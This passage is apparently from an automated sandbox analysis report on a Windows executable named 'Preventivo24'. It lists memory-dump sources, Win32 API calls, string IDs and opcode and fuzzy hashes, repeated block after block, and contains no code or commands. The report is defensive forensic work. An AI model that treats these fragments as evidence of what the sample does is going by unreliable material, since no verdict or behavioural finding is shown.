                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
                                                                              • String ID:
                                                                              • API String ID: 1153077990-0
                                                                              • Opcode ID: 2a9809fe7b8399c13d3e8466069daeea5bfa4ccf9fcf9d5c19888f6ebf26b874
                                                                              • Instruction ID: 61c0d77ccf67c07f108e96ec8c6c6a1693dae978fea9a35ac1c9dd1d0e2c374e
                                                                              • Opcode Fuzzy Hash: 2a9809fe7b8399c13d3e8466069daeea5bfa4ccf9fcf9d5c19888f6ebf26b874
                                                                              • Instruction Fuzzy Hash: 9E419171E043499BDB24CFA5CD447EEFBF8AF59310F148269E821A7284D7349980CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,010877F9,0108775C,010879FD), ref: 01087795
                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 010877AB
                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 010877C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                              • API String ID: 667068680-1718035505
                                                                              • Opcode ID: 5faf449094334e8fb2cc0206e997bf98ca40a4ff75bc14dcd5ac1c594554076d
                                                                              • Instruction ID: 99b9f7fe8c4a600f5c3243b4d99ca2ec64e3672e50c662971ed1a7168b4eaff6
                                                                              • Opcode Fuzzy Hash: 5faf449094334e8fb2cc0206e997bf98ca40a4ff75bc14dcd5ac1c594554076d
                                                                              • Instruction Fuzzy Hash: 30F0C83671A2615F6BB67DB9498066FFED87B0561433000B9EAD1D324CE710C480C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00EBDBB7
                                                                              • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00EBDBDD
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBDBF5
                                                                              • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00EBDC23
                                                                              • GetParent.USER32(?), ref: 00EBDD0B
                                                                              • SendMessageW.USER32(00000000,00000136,?,?), ref: 00EBDD1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Parent
                                                                              • String ID:
                                                                              • API String ID: 1020955656-0
                                                                              • Opcode ID: c14ddb0feff6d3b57d756c5e17c7ba7c0d613e985fc39cdaf992bcef8df89ba5
                                                                              • Instruction ID: 1a759867709b31a8eaaa26c78826849b0b0efab600036e28a20ae2ea8449f5d3
                                                                              • Opcode Fuzzy Hash: c14ddb0feff6d3b57d756c5e17c7ba7c0d613e985fc39cdaf992bcef8df89ba5
                                                                              • Instruction Fuzzy Hash: 5E612672902618AFDB259FE4DD09FAEBBB9FF08700F100129F625AB294D7706940CF10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 00F99368
                                                                              • GetParent.USER32(00000000), ref: 00F993D4
                                                                              • GetWindowRect.USER32(00000000), ref: 00F993DB
                                                                              • GetParent.USER32(00000000), ref: 00F993EA
                                                                                • Part of subcall function 00F4BC20: GetWindowRect.USER32(?,?), ref: 00F4BCBB
                                                                                • Part of subcall function 00F4BC20: GetWindowRect.USER32(?,?), ref: 00F4BCD3
                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00F994E6
                                                                              • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 00F994FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageRectSendWindow$Parent
                                                                              • String ID:
                                                                              • API String ID: 425339167-0
                                                                              • Opcode ID: 79180b5f051dc16d140d9e214419b825757c704b049ed9e0f97449fa8474ada3
                                                                              • Instruction ID: 35b13045796d8201b1d9e1f8e9264e0e4976cfa7ce34b139a1f45ed90f54e1f4
                                                                              • Opcode Fuzzy Hash: 79180b5f051dc16d140d9e214419b825757c704b049ed9e0f97449fa8474ada3
                                                                              • Instruction Fuzzy Hash: 1D614B75D02218AFDB14CFA4C949BADFBB5FF48310F14422AE815B7384DB746985CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00EC53CD
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00EC53EF
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00EC5417
                                                                              • __Getcoll.LIBCPMT ref: 00EC54E1
                                                                              • std::_Facet_Register.LIBCPMT ref: 00EC5526
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00EC5567
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                              • String ID:
                                                                              • API String ID: 1184649410-0
                                                                              • Opcode ID: 9ecab00fc7ccbb4cc780a700a4a95a881698e60e1087597ce8907bc7cf9c1bf3
                                                                              • Instruction ID: 89fe5d1303ae64a48e330b680261f750714e378e74404830f46201ce7c9728af
                                                                              • Opcode Fuzzy Hash: 9ecab00fc7ccbb4cc780a700a4a95a881698e60e1087597ce8907bc7cf9c1bf3
                                                                              • Instruction Fuzzy Hash: 0351DD72C01618DFCB15DF98DA80B9DFBB1FF50314F60816ED8656B280DB35AA86CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,0108C201,0108C1C4,?,?,00EC253D,00FBBF30,?,00000008), ref: 0108C218
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0108C226
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0108C23F
                                                                              • SetLastError.KERNEL32(00000000,0108C201,0108C1C4,?,?,00EC253D,00FBBF30,?,00000008), ref: 0108C291
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: cea0882844a910032321757055224664decf585d1940514a337b141e3402eb7b
                                                                              • Instruction ID: 05d665858d26f485e14ea1cf5cf36537d69085f2d84c16b8a067019a3cfcf8f6
                                                                              • Opcode Fuzzy Hash: cea0882844a910032321757055224664decf585d1940514a337b141e3402eb7b
                                                                              • Instruction Fuzzy Hash: E901D43210D31B5EBB7935FC7D86AEA3FB8EB056B0760037AE1F8851D4EF1148919268
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00EB7314
                                                                              • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00EB7346
                                                                              • SendMessageW.USER32(?,0000110A,00000004,?), ref: 00EB74C0
                                                                              • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00EB74E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: rP
                                                                              • API String ID: 3850602802-4195262923
                                                                              • Opcode ID: c722ad7ce3256f5abe9548597c21b01603912fca43e48f8efe3e48332c84aac2
                                                                              • Instruction ID: a9740e0509402657dd353afa8d8afb1211be8d5593b7872471ce289961f6b2e2
                                                                              • Opcode Fuzzy Hash: c722ad7ce3256f5abe9548597c21b01603912fca43e48f8efe3e48332c84aac2
                                                                              • Instruction Fuzzy Hash: 87A17A72A04214DFCB25DF68D880AEEBBB5FF88314F055169E891BB691DB30ED41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,00000000,80000000,00000000,00000000,?,00000309,00000000), ref: 00EBDA1A
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBDA29
                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00EBDA35
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateFindHeapProcessResourceWindow
                                                                              • String ID: SysTabControl32$TabHost
                                                                              • API String ID: 2520390496-2872506973
                                                                              • Opcode ID: 49a6a4f220707c94cbf9689b0b010da06e49d897586ad75130ec10b7f2589861
                                                                              • Instruction ID: fa79e4e5fba45b03ff1e4b327050dfd8ba11915edc9eece386a5b9e47f5c43cf
                                                                              • Opcode Fuzzy Hash: 49a6a4f220707c94cbf9689b0b010da06e49d897586ad75130ec10b7f2589861
                                                                              • Instruction Fuzzy Hash: BA61CF35A042149FCB14EF69C885BAEBBF5FF8C320F144169E919AB381DB34AC05CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLastError.KERNEL32 ref: 00FBF134
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00FBF150
                                                                              • GetExitCodeProcess.KERNEL32(00000000,010F6BE7), ref: 00FBF161
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FBF16F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                              • String ID: open
                                                                              • API String ID: 2321548817-2758837156
                                                                              • Opcode ID: 8eb69b4a8092626b1601408f9c3958b96f281b7c26829a4087132082c6798f51
                                                                              • Instruction ID: 0ef59c73f0dbf9450fdbf4d3fcaeb368a4f076655dbbd0faf0498883ec6643ff
                                                                              • Opcode Fuzzy Hash: 8eb69b4a8092626b1601408f9c3958b96f281b7c26829a4087132082c6798f51
                                                                              • Instruction Fuzzy Hash: 14716771E00649CBDB14CFA9C8547AEBBB4FF48324F144269E825A73D1EB78A945CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(011D0080,B5580983,?), ref: 00FF641F
                                                                              • EnterCriticalSection.KERNEL32(?,B5580983,?), ref: 00FF642C
                                                                              • OutputDebugStringW.KERNEL32(00FD7FF2,?,00000000), ref: 00FF64F5
                                                                              • LeaveCriticalSection.KERNEL32(?,00000000), ref: 00FF6587
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Strings
                                                                              • Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 00FF6473
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
                                                                              • String ID: Logger::SetLogFile( %s ) while OLD path is:%s
                                                                              • API String ID: 117955849-1927537607
                                                                              • Opcode ID: 688652170bd1edefb597211e95a34ae9d0eda76412d596c650a45792e4db9a79
                                                                              • Instruction ID: 1556028b138316297ccace816988595b97179544e56700dd79ed393fe4cab150
                                                                              • Opcode Fuzzy Hash: 688652170bd1edefb597211e95a34ae9d0eda76412d596c650a45792e4db9a79
                                                                              • Instruction Fuzzy Hash: 6A51ED35900208CFCF15DFA8C9557BEBBB1EF49324F184199E925A7392DB35AE02DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 00EC4882
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 00EC488F
                                                                              • GetLastError.KERNEL32 ref: 00EC48CD
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00EC4904
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 2767541406-3733053543
                                                                              • Opcode ID: 5fae8bd1e94a23364659337107ff40096607609a9cd72f3519d23ca958afe35f
                                                                              • Instruction ID: e6b080b296375320b35c2fc9ecd198a484e455ce04138f8f191880b865590964
                                                                              • Opcode Fuzzy Hash: 5fae8bd1e94a23364659337107ff40096607609a9cd72f3519d23ca958afe35f
                                                                              • Instruction Fuzzy Hash: DD316D75A41208AFDB28DFA0DA49BEEBBF8FB08714F101169F811B72C0DB759944CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00F9964D
                                                                              • SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00F99698
                                                                                • Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
                                                                                • Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A
                                                                                • Part of subcall function 00F773D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412
                                                                                • Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
                                                                                • Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
                                                                                • Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
